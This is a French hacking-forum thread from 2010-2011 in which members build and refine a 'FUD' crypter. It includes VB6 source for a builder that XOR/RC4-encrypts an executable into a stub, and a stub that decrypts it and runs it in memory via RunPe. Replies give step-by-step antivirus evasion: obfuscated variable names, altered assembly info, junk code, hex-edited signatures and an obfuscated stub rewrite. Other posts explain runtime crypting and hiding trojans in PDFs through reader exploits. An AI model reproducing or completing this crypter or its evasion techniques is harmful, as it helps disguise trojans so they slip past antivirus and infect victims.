Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 26-12-2010 01:34:58

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Coder un crypter

Salut a tous

je viens poster pour de l'aide et puis pour toujours apprendre en s'amusant tel est ma devise

le but n'étant pas de vous inciter a quoi que ce soit d'illégal mais juste pour se sécuriser sois même ou pouvoir aider les autres internaute il faut devancer les attaques et pour ça il faut bien les apprendre !!!

j'ai donc décider de coder un crypter fud je commence et j'aimerais comprendre les principes de ceci

voici mes sources en vb6

mais ça ne fonctionne pas en l'état alors si un connaisseur veut m'aider

le crypter fait l'eof il crypte en xor ou rc4

donc trois checkbox et 1 ShowOpen et 1 ShowSave


Private Sub Command1_Click()

With CD
.DialogTitle = "selectionne archive"
.Filter = "Application EXE|*.exe"
.ShowOpen
End With

If Dir(CD.FileName) = vbNullString Then Exit Sub

Text1.Text = CD.FileName

End Sub

Private Sub Command2_Click()

With CD
.DialogTitle = "sauvegarder"
.Filter = "Application EXE|*.exe"
.ShowSave
End With

Open App.Path & "\" & "Stub.dll" For Binary As #1

stub = Space(LOF(1))
Get #1, , stub
Close #1

Dim EOF As String

If Check1.Value = 1 Then EOF = ReadEOFData(Text1.Text)

Dim bin As String

Open Text1.Text For Binary As #1

bin = Space(LOF(1))

Get #1, , bin

Close #1

Dim RC4 As New clsRC4, xXor As New clsXOR

Dim encryt As String

If Option1.Value = 1 Then

bin = RC4.EncryptString(bin, Text2.Text)

Encryptacion = "RC4"

End If

If Option2.Value = True Then

bin = xXor.EncryptString(bin, Text2.Text)

Encryptacion = "XOR"

End If

Dim dates As String

datos = stub & "crack-wifi[$].com" & Encryptacion & "crack-wifi[$].com" & Text2.Text & "crack-wifi[$].com"

Open CD.FileName For Binary As #1

Put #1, , dates

Close #1

If Check1.Value = 1 Then Call WriteEOFData(CD.FileName, EOF)



End Sub

et le stub

Sub Main()

Dim Misdates As String

Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
     Misdatos = Space(LOF(1))
     Get #1, , Misdates
     Close #1
     
     Dim xSplit() As String
     
     xSplit() = Split(Misdatos, "crack-wifi[$].com")
     
     'xSplit(0) = Stub
     'xSplit(1) = el archivo encryptado
     'xSplit(2) = La encryptacion que usa
     'xSplit(3) = La contraseña de desencryptacion
     
     Dim RC4 As New clsRC4, xXor As New clsXOR
     
     If xSplit(2) = "RC4" Then
     
     xSplit(1) = RC4.DecryptString(xSplit(1), xSplit(3))
     
     End If
     
     If xSplit(2) = "XOR" Then
     
     xSplit(1) = xXor.DecryptString(xSplit(1), xSplit(3))
     
     End If
     
     Dim hdatos() As Byte
     
     hdatos() = StrConv(xSplit(1), vbFromUnicode)
     
     Call RunPe(App.Path & "\" & App.EXEName & ".exe", hdatos(), Command)
     
     
     
     
     

End Sub

je n'utilise pas le vb.net (pour l'instant) because toutes les sources et les tutos sont en vb6

mais j'apprends petit a petit et j'étudie si certains en doute wink

en l'état le stub donne ceci sur novirus thank

File Info

Report date: 2010-12-25 21:24:04 (GMT 1)
File name: stub-dll
File size: 28672 bytes
MD5 Hash: dbf6c1d91da7dd2ed99bb6fd89d4e951
SHA1 Hash: 9a65bbde325c1a79137f60f75be2eee19baa6105
Detection rate: 7 on 16 (44%)
Status: INFECTED

Detections

a-squared - Backdoor.Win32.SdBot!IK
Avast -
AVG - Win32/Cryptor
Avira AntiVir - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.ZGY.8
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 - Backdoor.Win32.SdBot
Kaspersky -
NOD32 -
Panda - Suspicious file
TrendMicro -
VBA32 - Trojan.VB.Levelup
VirusBuster -

Scan report generated by
NoVirusThanks.org

pas mal je trouve mais c'est le fud ou rien smile qui est amusant

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 26-12-2010 10:31:26

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Coder un crypter

Je suis désolé, je connais pas le vb6 mais j'espère que tu vas réussir wink

Si t'as un problème en C/C++ là je pourrais t'aider wink


Sharkoff

Hors Ligne

#3 26-12-2010 11:15:01

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Coder un crypter

Merci Squaks

je viens de trouver une ligne ou je me suis loupé comme un bleue (justement) ce qui me permet d'apprendre

la voici

datos = stub & "crack-wifi[$].com" & Encryptacion & "crack-wifi[$].com" & Text2.Text & "crack-wifi[$].com"

il manque "bin" et a force de recopier sans comprendre Encryptacion n'est pas le nom de mon caption je bosse dessus mais si drdarkhack veut nous aider a avancer alors le sujet est ouvert smile

++

Hors Ligne

#4 08-01-2011 08:45:11

ptit-trucideur
Banni(e)
Inscription : 08-01-2011
Messages : 10

Re : Coder un crypter

change les strings (lol..) dans le code du stub et l'assembly de l'exe, tu aura un bien meilleur resultat.

Avira AntiVir - TR/Dropper.Gen

par contre lui est assez emmerdant a bypass

Dernière modification par ptit-trucideur (08-01-2011 08:48:13)


Logorrhées et discours amphigouriques

Hors Ligne

#5 23-01-2011 06:59:13

drdarkhack
Banni(e)
Inscription : 03-10-2010
Messages : 17

Re : Coder un crypter

Le vb6 c'est vraiment berk pour coder un crypter... c'est pas vraiment ce que je recommande pour commencer.
Télécharge vb.net et prend une source.

1) Tu remplace les "Dim bin" par "Dim autrechose".
NOD32 et Panda permet d'être bypasser avec cette méthode.

2)Pour Antivir Avira dans les propriété du stub tu dois changer les informations de l'assembly (je te laisse faire une petite recherche)

3) Ajoute également 3 bon junk code (augmentation de la taille de 30 ko) grâce a cette méthode avg,a-squared,Ikarus sont bypasser.

4) Il reste bitdefender le seul que je n'arrive pas a bypasser ( voir http://vscan.novirusthanks.org/analysis … 1Yi1leGU=/ ) mais je pense qu'en changer la signature du stub avec Hex Workshop nous pourrions le bypasser.

Dernière modification par drdarkhack (23-01-2011 07:01:28)

Hors Ligne

#6 23-01-2011 15:53:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Coder un crypter

Oui je confirme, bit defender m'avait posé problème sur un exe je l'ai donc enlevé a la "main" wink

Hors Ligne

#7 23-01-2011 20:31:02

dkdfk
N00b
Inscription : 23-01-2011
Messages : 2

Re : Coder un crypter

@drdarkhack

4) Il reste bitdefender le seul que je n'arrive pas a bypasser ( voir http://vscan.novirusthanks.org/analysis … 1Yi1leGU=/ ) mais je pense qu'en changer la signature du stub avec Hex Workshop nous pourrions le bypasser.

le probleme est que c pas compliqué de faire un stub fud mais tu na pas scanne ton output file (le fichier crypté), interesse toi plutot a celui ci plutot qu'au stub..  , avira le detecte a tout les coups ..

Avira AntiVir - TR/Dropper.Gen

ya aussi un truc a verifier si le crypter est scantime et runtime:

A scantime crypter uses encryption on a file so that it isn't the same as the original file. Because it gets decrypted (so the file can run) and usually drops files, it means that the file becomes un-encrypted and hence detectable at runtime.

A Runtime crypter injects the executable into memory instead of dropping files. Because AV's can't scan memory on injection, it doesn't get detected.

si il est juste scantime, si tu regarde le code source le fichier decrypté se crée dans %temp% lors de l execution(donc detectable..)
quand il est runtime il s execute automatiquement en memoire

Dernière modification par dkdfk (23-01-2011 20:49:16)

Hors Ligne

#8 23-01-2011 20:59:56

dkdfk
N00b
Inscription : 23-01-2011
Messages : 2

Re : Coder un crypter

@Veidam ton crypter ressemble a un crypter runtime(runpe) + encryption XOR et RC4.

essaye de compiler ceci, tu devrait gagner quelque detections. possiblement finir d'encrypter les variables sur le crypter, j'ai fait toute les variable du stub :-)
pense bien a verifier les variable egales (ce dont parle drdarkhack en 1) des 2 cotés (crypter + stub) avant de les remplacer pour que tout corresponde bien.

stub:

Sub Main()

Dim DRsa5ShH4g As String

Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
     uOjJu2En3 = Space(LOF(1))
     Get #1, , DRsa5ShH4g
     Close #1
     
     Dim bCVgtSkko() As String
     
     bCVgtSkko() = Split(uOjJu2En3, "crack-wifi[$].com")
     
     'bCVgtSkko(0) = Stub
     'bCVgtSkko(1) = el archivo encryptado
     'bCVgtSkko(2) = La encryptacion que usa
     'bCVgtSkko(3) = La contraseña de desencryptacion
     
     Dim A6x5rPWgS As New clsRC4, yXaM6sVE2 As New clsXOR
     
     If bCVgtSkko(2) = "RC4" Then
     
     bCVgtSkko(1) = A6x5rPWgS.DecryptString(bCVgtSkko(1), bCVgtSkko(3))
     
     End If
     
     If bCVgtSkko(2) = "XOR" Then
     
     bCVgtSkko(1) = yXaM6sVE2.DecryptString(bCVgtSkko(1), bCVgtSkko(3))
     
     End If
     
     Dim up58gcdjS() As Byte
     
     up58gcdjS() = StrConv(bCVgtSkko(1), vbFromUnicode)
     
     Call RunPe(App.Path & "\" & App.EXEName & ".exe", up58gcdjS(), Command)

crypter:

Private Sub Command1_Click()

With CD
.DialogTitle = "selectionne archive"
.Filter = "Application EXE|*.exe"
.ShowOpen
End With

If Dir(CD.FileName) = vbNullString Then Exit Sub

Text1.Text = CD.FileName

End Sub

Private Sub Command2_Click()

With CD
.DialogTitle = "sauvegarder"
.Filter = "Application EXE|*.exe"
.ShowSave
End With

Open App.Path & "\" & "Stub.dll" For Binary As #1

stub = Space(LOF(1))
Get #1, , stub
Close #1

Dim EOF As String

If Check1.Value = 1 Then EOF = ReadEOFData(Text1.Text)

Dim bin As String

Open Text1.Text For Binary As #1

bin = Space(LOF(1))

Get #1, , bin

Close #1

Dim A6x5rPWgS As New clsRC4, yXaM6sVE2 As New clsXOR

Dim encryt As String

If Option1.Value = 1 Then

bin = A6x5rPWgS.EncryptString(bin, Text2.Text)

Encryptacion = "RC4"

End If

If Option2.Value = True Then

bin = yXaM6sVE2.EncryptString(bin, Text2.Text)

Encryptacion = "XOR"

End If

Dim dates As String

datos = stub & "crack-wifi[$].com" & Encryptacion & "crack-wifi[$].com" & Text2.Text & "crack-wifi[$].com"

Open CD.FileName For Binary As #1

Put #1, , dates

Close #1

If Check1.Value = 1 Then Call WriteEOFData(CD.FileName, EOF)



End Sub
     
     
     

End Sub

Dernière modification par dkdfk (23-01-2011 21:06:29)

Hors Ligne

#9 23-01-2011 23:38:42

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Coder un crypter

et bien merci de votre aide je la prends ça fait plaisir smile

Dernière modification par Veidam (23-01-2011 23:39:28)

Hors Ligne

#10 02-12-2011 02:16:07

h9k
Membre Radioactif
Inscription : 09-08-2011
Messages : 74

Re : Coder un crypter

une question de noob : si on crypte le trojan pour que les antivirus ne le détectent pas, comment ce programme peut il encore marcher ?

a moins que ça soit des criptages spéciaux qui ne font que d'infimes modifications et qui donc n'empèchent pas le .exe de marcher.

je suppose que si je le crypte avec pgp, gpg ou truecrypt le .exe ne marche plus non ?

est ce possible de mettre le trojan crypté dans un pdf ? et que ça marche pour le dernier adobe reader c'est a dire adobe reader X (10.1.1)

et si l'on ne modifie que la signature ? comme la : http://www.tutofr.com/fichiers/dichotomie.php

Hors Ligne

#11 02-12-2011 02:28:51

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Coder un crypter

une question de noob : si on crypte le trojan pour que les antivirus ne le détectent pas, comment ce programme peut il encore marcher ?

Oui mais il faut pas faire ça n'importe comment.

et si l'on ne modifie que la signature ?

Modifier la signature altère le code, les signatures maintenant sont complexes, je dirai que l'asm peut te rendre service dans bien des cas wink soit tu fais un jmp (jump) vers une partie non utilisé par le programme et tu plante ton code la avant de faire un RET (retour) dans le code soit tu modifies la signature de manière égale au code original mais dans ce cas la valeur de ton nouveau code ne doit pas dépasser celui de l'ancien sinon tu va galérer hmm

Je suis pas un grand spécialiste, d'autres sauront te répondre mieux que moi je pense wink

Hors Ligne

#12 02-12-2011 13:58:48

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Coder un crypter

une question de noob : si on crypte le trojan pour que les antivirus ne le détectent pas, comment ce programme peut il encore marcher ?

Le trojan en lui-même est entièrement chiffré, et on y ajoute un petit bout de code qui va le déchiffrer et envoyer directement le programme en clair dans la mémoire (pour court-circuiter l'antivirus).

je suppose que si je le crypte avec pgp, gpg ou truecrypt le .exe ne marche plus non ?

Il ne marchera pas tant que tu ne le déchiffreras pas, mais il risque de se faire détecter par l'antivirus au moment du déchiffrement wink

est ce possible de mettre le trojan crypté dans un pdf ? et que ça marche pour le dernier adobe reader c'est a dire adobe reader X (10.1.1)

Dans le cas du PDF, tu n'intègres pas un trojan exécutable dans le document, mais tu rends le document "spécial" pour qu'il fasse planter le lecteur (p-ex Adobe Reader) et tu profites de ce plantage pour injecter le code du trojan directement en mémoire. Ceci implique donc d'avoir une faille à exploiter sur le lecteur PDF : je suppose que Reader X en a, mais sans doute moins que les versions intérieures, et son mécanisme de sandbox ne facilite pas les choses.
De nouveau, un antivirus pourrait détecter le code malicieux dans le fichier PDF, pour le camoufler on ne parle pas de chiffrement mais plutôt d'encodage. Contrairement au chiffrement, l'encodage ne requiert pas de mot de passe, c'est juste une façon différente de représenter le même code.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 810 02-12-2015 10:52:08 par _ROOTt
1 1412 26-09-2014 12:10:30 par Furyo
5 1825 12-09-2013 17:21:27 par M1ck3y
3 5740 11-11-2012 14:57:58 par spawn
Crypter FUD par whiteshark1995
1 3330 03-01-2012 13:50:05 par algerino

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.107 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]